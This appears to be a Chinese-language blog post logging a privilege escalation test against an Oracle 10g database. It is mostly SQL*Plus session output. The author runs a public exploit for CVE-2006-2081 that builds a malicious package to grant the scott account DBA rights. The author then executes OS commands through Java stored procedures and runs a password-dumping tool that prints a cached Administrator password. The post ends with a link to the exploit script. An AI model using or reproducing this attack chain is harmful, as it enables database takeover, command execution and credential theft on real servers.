Oracle 10g提权测试

一直想摸索一下orcl提权的方式，今天测试了一下10g，可以成功提权。

C:\wmpub>sqlplus scott/tiger@orcl

SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016

Copyright (c) 1982, 2005, Oracle. All rights reserved.

连接到:

Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production

With the Partitioning, OLAP and Data Mining options

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_

------------------------------ ------------------------------ --- --- ---

SCOTT CONNECT NO YES NO

SCOTT RESOURCE NO YES NO

SQL> @dbms_exp_ext.sql

[+] dbms_exp_ext.sql exploit (CVE-2006-2081)

[+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com

[+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2

Target username (default TEST): scott

[-] Wait...

程序包已创建。

[-] Building evil package...

原值 6: EXECUTE IMMEDIATE 'GRANT DBA TO &the_user';

新值 6: EXECUTE IMMEDIATE 'GRANT DBA TO scott';

程序包体已创建。

[-] Finishing evil package...

PL/SQL 过程已成功完成。

[-] YOU GOT THE POWAH!!

SQL> select * from user_role_privs;  //提升得到JAVASYSPRIV权限

USERNAME GRANTED_ROLE ADM DEF OS_

SCOTT JAVASYSPRIV NO YES NO

SQL> @2.sql //执行系统命令，新建账号密码

Java created.

Function created.

Procedure created.

PL/SQL procedure successfully completed.

grant javasyspriv to system

*

ERROR at line 1:

ORA-01932: ADMIN option not granted for role 'JAVASYSPRIV'

Windows IP Configuration

Ethernet adapter ????:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 10.9.10.202

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . : 10.9.0.1

User accounts for \\

-------------------------------------------------------------------------------

Administrator ASPNET Guest

IUSR_SNOWW-2CD7D87E5 IWAM_SNOWW-2CD7D87E5 SUPPORT_388945a0

The command completed with one or more errors.

SQL>

SQL> exec :x:=run_cmd('D:\temp\GetPass_cmd.exe');  //读取系统缓存的账号密码 

UserName: Administrator

LogonDomain: WIN2003-WVS2

password: abc123!

UserName: NETWORK SERVICE

LogonDomain: NT AUTHORITY

password:

UserName:

LogonDomain:

Specific LUID NOT found

UserName: ANONYMOUS LOGON

UserName: WIN2003-WVS2$

LogonDomain: WORKGROUP

提权脚本：http://rawlab.mindcreations.com/codes/exploit/oracle/dbms_exp_ext.sql